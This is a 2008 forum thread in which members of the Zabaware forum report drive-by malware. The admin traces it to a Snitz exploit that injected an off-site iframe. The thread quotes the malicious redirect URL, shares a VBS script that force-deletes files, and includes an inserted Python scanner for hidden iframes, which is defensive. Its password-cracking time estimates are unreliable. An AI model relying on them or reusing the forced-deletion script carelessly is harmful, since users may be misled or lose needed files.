Zabaware Support Forums

Zabaware Forums => General Discussion => Topic started by: freddy888 on January 23, 2008, 06:10:36 pm

Title: Virus alert.
Post by: freddy888 on January 23, 2008, 06:10:36 pm
Just wanted to warn people that I picked up at least 2 viruses here today.  One of them was JS/Psyme.NR, not sure what that does.  Also I keep getting the file ~tmp1174.exe which is another virus related file.  I repeated my surfing and narrowed it down to the Zabaware site.  I believe the viruses downloaded themselves when I went to the forum page here, or possibly when I clicked on 'Active Topics'.  Hard to tell, but they were definitely from here as I was watching my Documents and Settings folder as I navigated.  Soon as I came here I got the viruses again.

One or both might be trojans.  Symptoms are that at least one of them hijacks Internet Explorer and tries to make changes to the shell.  I keep getting redirected to dodgy pages and unrelated search pages or results.  This makes surfing a pain as the browser just takes you anywhere it feels like.

I can't seem to shift them as they reappear after a reboot.  AVG doesn't even spot the ~tmp1174.exe so it can do nothing about it.
These viruses are a real pain so watch out.

Perhaps this has something to do with the forum code being switched off ?
Title: Virus alert.
Post by: markofkane on January 23, 2008, 06:24:58 pm
Possibly. I use Firefox with NoScript, and so far had no warnings of any kind here.

Maybe this is why forum code is off. But html isn't.

I hope Robert won't have to disable posting pics, just disable certain tags, like .exe, .js,  etc, like other forums can.

But if he has to, I will understand for security reasons.

It may be coming from google-analytics.com, which I block.[?][?][?][?][?][?]

My theory is why they reappear after reboot, is there is a new program starting up with your computer. If you can identify the program, and stop it from starting up, that may solve it.

But best bet is to run an online scan with Trend Micro.

And download and scan with a program called "Hijack this" and post it on a tech forum for those that are good at analyzing it. Just some ideas.
Title: Virus alert.
Post by: Bill819 on January 23, 2008, 07:51:41 pm
Hi Freddy
I just bought and installed the latest anti virus software last week and I get no warnings of any kind for this site. I did not try to download in pictures though so maybe there might be something attached to one of them.
Bill
Title: Virus alert.
Post by: tedathome on January 23, 2008, 10:45:19 pm
My Norton Symantec blocks this. It happens every time I try to log on.
It says it is trying to install an update to Adobe flash or shockwave player. I don't remember which. It wants you to enable an active x control so if you get that far, x it out.
 Be safe friends and do what it takes to protect yourself and your computer.
Title: Virus alert.
Post by: onthecuttingedge2005 on January 23, 2008, 10:49:00 pm
Hi Freddy.

here is some info about that file:

http://www.prevx.com/filenames/X9262996960045788-X1/~TMP1174.EXE.html

hope it helps.
Jerry[8D]
Title: Virus alert.
Post by: dgher1 on January 24, 2008, 03:04:25 am
When I click on Forum at the Zabaware home page, when it gives a warning I click Yes and it goes to the All Forums page. But if I click back on the down arrow I get http:/ www.yourxxxblog.blog/js_go_f1.php. If this helps you guys. I've been a great fan. I didn't put the second / in so it didn't get on this message. You may want to delete it.
Title: Virus alert.
Post by: freddy888 on January 24, 2008, 10:37:23 am
Thanks for the help guys, it's much appreciated [:)]

Just so you know I managed to remove ~tmp1174.exe but when I came back here just now I got it again, so the virus is still active here.  I noticed it downloaded as I entered the forum and it froze my pc for a bit.  I managed to stop it altering Internet Explorer this time though as I have installed SpyBot Search and Destroy.  I'm not so sure now if they do reappear after reboot, but I'll give 'Hijack This' a go too, thanks Mark.  

IE still isn't working properly though, so I may just reinstall everything and update my virus software.

dgher1, yes I think I got that too, it looks familiar.  Mostly it seems to be hijacking search engine results like yahoo and then redirecting to some dodgy looking search pages when you click on the results.  This renders the main search engines useless.

TedAtHome, yes I have had that Active X request too, I denied it though too, which I think was wise.

Seems to me that some idiot has dropped a few viruses here.  Pain in the Royal A** !
Title: Virus alert.
Post by: freddy888 on January 24, 2008, 10:40:07 am
quote:
Originally posted by onthecuttingedge2005

Hi Freddy.

here is some info about that file:

http://www.prevx.com/filenames/X9262996960045788-X1/~TMP1174.EXE.html

hope it helps.
Jerry[8D]



Certainly does Jerry - I can't do any web searches at the moment so I would never have found it.  Looks like a pretty new virus too...and nasty.

I didn't like this bit :

"The process hooks code into all running processes which could allow it to take control of the system or record keyboard input, mouse activity and screen contents."
Title: Virus alert.
Post by: onthecuttingedge2005 on January 24, 2008, 11:32:01 am
Hi Freddy.

Some viruses and trojans are persistent and will cripple the ability to delete them; they can also cripple anti-virus installations to prevent a person from installing anything that would compromise the virus or trojan.

If you know what folder the applications are running in, you could use a little VBS code I wrote: paste the code into a text file, save it as DeleteFiles.vbs and place it in your Startup folder, so every time you reboot the .vbs file will look for those apps and delete them as your computer starts.

I have used this trick on some computers that were infected which gave me time to install anti-virus software to get rid of the rest of the application in memory.

Option Explicit
Dim FileSys, DelFile1, DelFile2, DelFile3, anArray, arrayElement

Set FileSys = CreateObject("Scripting.FileSystemObject")

'Write the file or application name with extension to be deleted here between the quotes,
'with the exact full path (drive and folder)
DelFile1 = "C:\Downloads\Some_Unwanted_File1.exe"
DelFile2 = "C:\Downloads\Some_Unwanted_File2.exe"
DelFile3 = "C:\Downloads\Some_Unwanted_File3.exe"

anArray = Array(DelFile1, DelFile2, DelFile3)

'If one file is locked by a running process, skip it and carry on with the rest
'instead of stopping the whole script on the first error
On Error Resume Next

'The second argument (True) forces deletion even if the file has the read-only attribute set
For Each arrayElement In anArray
    If FileSys.FileExists(arrayElement) Then FileSys.DeleteFile arrayElement, True
Next


When activated, the above code doesn't ask for permission to delete a file on Windows 2000 or below, but Windows XP or Windows Vista may prevent it from running, so you might have to give the .vbs file permission to run.

Be careful not to delete any important system files.

I hope it helps.
Jerry[8D]
Title: Virus alert.
Post by: freddy888 on January 24, 2008, 11:35:25 am
Thanks Jerry, I will bear that in mind, but past experience of removing viruses has left me thinking it is easier and quicker to just reinstall windows and update my virus s/w.  There's not much I want to keep on this machine at the moment so it's probably my best option.  But I will take note of your code, it's certainly a cunning way to deal with it.
Title: Virus alert.
Post by: Medeksza on January 24, 2008, 01:27:55 pm
I've made sure the virus checker on the Zabaware server is up to date and ran a full system scan. I can't seem to find anything. Can you give me exact URL's where you are getting the virus alert? If there is something wrong it should be visible in the HTML page source itself.
Title: Virus alert.
Post by: Medeksza on January 24, 2008, 01:31:13 pm
Hmmm, I haven't found a virus yet, but the forum config has definitely been tampered with to turn off forum code and allow HTML. I put the settings back in place.
Title: Virus alert.
Post by: onthecuttingedge2005 on January 24, 2008, 04:08:51 pm
quote:
Originally posted by Medeksza

Hmmm, I haven't found a virus yet, but the forum config has definitely been tampered with to turn off forum code and allow HTML. I put the settings back in place.



Hi Rob.

It could have been a hacker. It might be safe to change the server's password to a password that is much stronger: upper and lower case with numbers, and at least 12 characters or more long.

a password of 12 or more in length even for a brute force program would take a very long time to crack.

it would take a brute force program about a month to crack, so it might be even safer to change the password every couple of weeks or so.

Jerry[8D]
Title: Virus alert.
Post by: jackgephart on January 24, 2008, 05:26:20 pm
I've got Norton Internet Security 2008 and even if some cookie or anything gives a little hiccup it lets me know; I saw nothing from this site. That should make you feel good Rob. If anything gets blocked or spoken of about this site from my Norton system, I will tell you immediately. I love this site and hope you keep it on for a long long time.
Title: Virus alert.
Post by: markofkane on January 24, 2008, 06:07:45 pm
I hope everything will be alright from now on.[:D][:D][:D]
Title: Virus alert.
Post by: Art on January 24, 2008, 07:22:07 pm
While some of the AV programs seem to work well not all work quite the same.

I got rid of Norton years ago as it was such a bloated memory hog and it had let a virus (malware, trojan, etc.) into my system that actually turned it off. It wouldn't even let me reboot unless I was connected to the Internet.

The FIRST thing I do with a new computer is install good AV software.
I have been using BitDefender for some time and am quite pleased with it. My friend uses Kaspersky and is likewise pleased with it.

While good AV programs aren't cheap or free, it is money well spent when one considers the consequences of NOT having one!!

BitDefender had a deal: 2 computers for 2 years for $69 USD (that's $17.25 / comp per year) not bad. It also performs update checks once an hour to ensure your system remains up to date.

Scan early and often, use strong passwords as Jerry recommended and change them frequently. Stay away from questionable sites if not sure about their content and don't open any email from someone you don't know (especially attachments).

Title: Virus alert.
Post by: Medeksza on January 24, 2008, 07:27:17 pm
I figured everything out now. It seems there was a pretty large attack on many Snitz forum sites last night: http://forum.snitz.com/forum/topic.asp?TOPIC_ID=66357

Basically this hacker created a username "All4You" on this forum and using the exploit above made himself admin of the forum. He added an "iframe" on the forum homepage that pointed to an off-server site that had a virus. This is why my virus scan turned up nothing, since the virus was off-site.

This virus would only load if you use Internet Explorer and have not run a Windows Update in a while. Firefox, Opera, and up to date Internet Explorer would be ok. If you have an up to date virus checker, you should be ok also. The forum was compromised from 5:23 PM January 23 until 1:31 PM January 24. If you are unsure, please get an up to date virus checker and run a full scan.

I apologize to anyone affected and thank you for bringing this to my attention.
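Rob's finding illustrates why a server-side virus scan came back clean: the malicious content was never on the server's disk, only an iframe tag in the served HTML that pulled the payload from another host. The check that would have caught it is to look at the page source itself for frames whose src points off-site, especially ones sized or styled to be invisible. The script below is an added example for this thread, not code from the Zabaware forum or from Snitz; the sample page, the hostname malicious.example and the path in it are constructed for illustration.

```python
"""Scan saved forum HTML for iframes that load content from another host.

Added example (not code from the Zabaware forum or from Snitz). The sample
page below is constructed for illustration; the off-site hostname
'malicious.example' is made up.
"""
from html.parser import HTMLParser
from urllib.parse import urlparse


class IframeCollector(HTMLParser):
    """Collects every <iframe> and <frame> start tag with its attributes."""

    def __init__(self):
        super().__init__()
        self.frames = []

    def handle_starttag(self, tag, attrs):
        if tag in ("iframe", "frame"):
            self.frames.append(dict(attrs))


def looks_hidden(attrs):
    """True if the frame is sized or styled so a visitor would never see it."""
    style = (attrs.get("style") or "").replace(" ", "").lower()
    if "display:none" in style or "visibility:hidden" in style:
        return True
    for key in ("width", "height"):
        value = (attrs.get(key) or "").strip().lower().rstrip("px")
        if value.isdigit() and int(value) <= 1:
            return True
    return False


def find_offsite_iframes(html, site_host):
    """Return frames whose src points at a host other than site_host.

    Relative srcs and absolute URLs on the same host are treated as the
    site's own content; everything else is reported, with a flag for
    frames that are hidden from the visitor.
    """
    parser = IframeCollector()
    parser.feed(html)
    findings = []
    for attrs in parser.frames:
        src = attrs.get("src") or ""
        host = urlparse(src).hostname
        if host is None:  # relative URL, served from this site
            continue
        if host.lower() == site_host.lower():
            continue
        findings.append({"src": src, "host": host, "hidden": looks_hidden(attrs)})
    return findings


# Constructed sample: a forum index page with one legitimate same-site frame
# and one injected, zero-size, display:none frame loading from another host.
SAMPLE_HTML = """
<html><body>
<h1>Forum</h1>
<iframe src="/forum/active.asp" width="600" height="400"></iframe>
<table><tr><td>Active Topics</td></tr></table>
<iframe src="http://malicious.example/js_go_f1.php" width="0" height="0"
        style="display: none"></iframe>
</body></html>
"""

if __name__ == "__main__":
    for hit in find_offsite_iframes(SAMPLE_HTML, "www.zabaware.com"):
        flag = "HIDDEN " if hit["hidden"] else ""
        print(f"{flag}off-site iframe -> {hit['src']}")
```

Run it against a copy of the forum's own HTML (saved with the browser, or fetched with a plain HTTP client) and the site's hostname; a hidden frame pointing at an unfamiliar host is exactly the signature described above. Because the content was injected through the forum's configuration rather than a file upload, a scan of the HTML that is actually served is the check that matters, and it is cheap enough to run on a schedule.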
Title: Virus alert.
Post by: jackgephart on January 25, 2008, 04:55:38 am
Man, Robert, you just amaze me being able to find that out so quickly. You must be very knowledgeable on this type of stuff. If I need any code questions answered I know who to ask now. Great job and great detective work.
Title: Virus alert.
Post by: markofkane on January 25, 2008, 05:02:47 am
I agree. People need to remember to keep their Operating systems updated. This affected those who did not have the latest updates, according to what I've read.  That, and a good Anti-Virus, Anti-Spyware program is crucial.

I also use Firefox, with NoScript for most surfing. I only allow scripts from sites I trust. Any 2nd party scripts are blocked. (I realize Firefox does not work on all sites, nor with Haptek player *at least I cannot get it to work*, but those are the exceptions)

I haven't got a nasty virus in years (knock on wood) because I know how to protect myself. I never open spam emails. And if I do, I disable html, and only allow text.[:D][:D][:D][:D]
Title: Virus alert.
Post by: dgher1 on January 25, 2008, 06:11:27 am
If I see something I'll let you know too. Don't know much, but I keep good updates.
Title: Virus alert.
Post by: freddy888 on January 26, 2008, 11:46:11 am
Nice work Rob. [8D]  My antivirus is now up to date.  Handily enough for me I was planning a completely fresh install of Windows anyway, so for me there was a silver lining to the cloud.  Many thanks.